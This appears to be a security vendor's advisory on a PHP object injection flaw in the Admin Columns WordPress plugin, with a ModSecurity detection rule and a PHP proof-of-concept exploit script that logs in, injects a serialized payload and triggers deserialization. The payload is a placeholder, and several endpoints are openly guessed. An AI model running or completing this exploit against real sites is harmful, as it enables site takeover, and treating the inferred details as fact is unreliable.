Published : June 13, 2026

CVE-2026-7654: Admin Columns <= 7.0.18 Authenticated (Contributor+) PHP Object Injection to Remote Code Execution via Custom Field Meta Value PoC, Patch Analysis & Rule

CVE ID CVE-2026-7654
Plugin codepress-admin-columns
Severity High (CVSS 8.8)
CWE 502
Vulnerable Version 7.0.18
Patched Version
Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7654 (metadata-based):
This vulnerability affects the Admin Columns plugin for WordPress (slug: codepress-admin-columns) in versions up to and including 7.0.18. It is an authenticated PHP Object Injection vulnerability that allows remote code execution via a bundled POP gadget chain. The vulnerability carries a CVSS score of 8.8 (High) and targets the `IdsToCollection::get_ids_from_string()` function.

The root cause is the use of `unserialize()` without an `allowed_classes` restriction on attacker-controlled input. According to the CWE-502 classification, the function processes post meta values that an authenticated contributor-level attacker can manipulate. The description confirms that `get_ids_from_string()` calls `unserialize()` on custom field meta values without any validation or whitelisting of allowed classes. Atomic Edge research infers that the plugin’s code likely fetches serialized data from a custom post meta field (e.g., `_admin_columns_ids`) and passes it directly to `unserialize()`. The presence of a bundled POP gadget chain (likely within the plugin’s own code or its dependencies) enables chaining deserialization gadgets to execute arbitrary code.

The exploitation method requires an authenticated WordPress user with at least Contributor-level permissions. The attacker first creates or edits a post and inserts a serialized PHP object into a custom meta field that the plugin processes. The attack vector likely involves either the WordPress REST API (e.g., `POST /wp-json/wp/v2/posts/{id}` with a `meta` key) or an AJAX handler (e.g., `admin-ajax.php?action=codepress-admin-columns-save-ids`). The serialized payload contains POP gadgets that, when deserialized, execute arbitrary system commands. Atomic Edge analysis infers that the plugin likely triggers deserialization when loading admin column settings for the affected post, so the exploit activates when an administrator or other user views the post in the admin list table.

The remediation requires the plugin developers to replace `unserialize()` with `json_decode()` or to enforce an `allowed_classes` parameter set to `false` in version 7.0.19. This change prevents arbitrary object instantiation even if an attacker provides malicious serialized data. The safest fix is to migrate from serialization to JSON encoding for any data that passes through post meta fields. The patch should also validate that meta values conform to expected formats before processing.

Successful exploitation results in complete compromise of the WordPress site. An attacker can execute arbitrary commands as the web server user, which typically allows reading sensitive files (e.g., `wp-config.php` containing database credentials), modifying or deleting files, creating new admin users, and installing malicious plugins or themes. This can lead to full site takeover, data exfiltration, and potential lateral movement to other services on the same server.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-7654 (metadata-based)
# Blocks PHP Object Injection via the Admin Columns plugin's AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261993,phase:2,deny,status:403,msg:'CVE-2026-7654: Admin Columns PHP Object Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-7654',chain"
SecRule ARGS_POST:action "@streq codepress-admin-columns-save-ids" 
  "chain"
SecRule ARGS_POST:ids "@rx O:[0-9]+:" 
  "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7654 - Admin Columns <= 7.0.18 - Authenticated (Contributor+) PHP Object Injection to Remote Code Execution via Custom Field Meta Value

// This PoC assumes the attacker has at least Contributor-level credentials.
// It exploits the unserialize() call in IdsToCollection::get_ids_from_string() by
// injecting a serialized POP gadget chain into a custom post meta field.
// The payload is triggered when the admin list table loads the affected post.

$target_url = 'http://example.com';  // Change this to the target WordPress URL
$username = 'attacker';
$password = 'attacker_password';

// The following serialized payload uses a hypothetical POP chain.
// In a real-world scenario, the attacker would need to craft a chain specific
// to the plugin's bundled gadgets. This example demonstrates the structure
// using a generic system command execution gadget (if available).
// Replace the payload with an actual working chain from the plugin's code.
$serialized_payload = 'O:20:"Custom_Command_Class":0:{}';

// Step 1: Authenticate and get a nonce for meta field updates.
function get_wp_nonce($url, $username, $password) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-login.php');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In');
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    $response = curl_exec($ch);
    curl_close($ch);
    
    // For this PoC, we assume we can get a nonce from the admin page.
    // In practice, the attacker might need to scrape the nonce from a form.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/edit-comments.php');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $response = curl_exec($ch);
    preg_match('/name="_wpnonce" value="([a-f0-9]+)"/i', $response, $matches);
    return isset($matches[1]) ? $matches[1] : '';
}

// Step 2: Create a new post with a malicious custom meta field.
function create_post_with_meta($url, $nonce, $serialized_payload) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/admin-ajax.php');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => 'codepress-admin-columns-save-ids',  // Inferred AJAX action
        'post_id' => '1',
        'ids' => $serialized_payload,
        '_wpnonce' => $nonce
    ]));
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

// Step 3: Trigger the deserialization by loading the WordPress admin list table.
// The plugin processes the stored meta value when rendering the table,
// thus executing the POP chain.
function trigger_deserialization($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-admin/edit.php?post_type=post');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

// Execute the exploit
echo "[+] Getting nonce...n";
$nonce = get_wp_nonce($target_url, $username, $password);
echo "[+] Nonce: $noncen";
echo "[+] Injecting serialized payload...n";
$result = create_post_with_meta($target_url, $nonce, $serialized_payload);
echo "[+] Response: $resultn";
echo "[+] Triggering deserialization...n";
trigger_deserialization($target_url);
echo "[+] Exploit completed. Check for remote code execution.n";

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School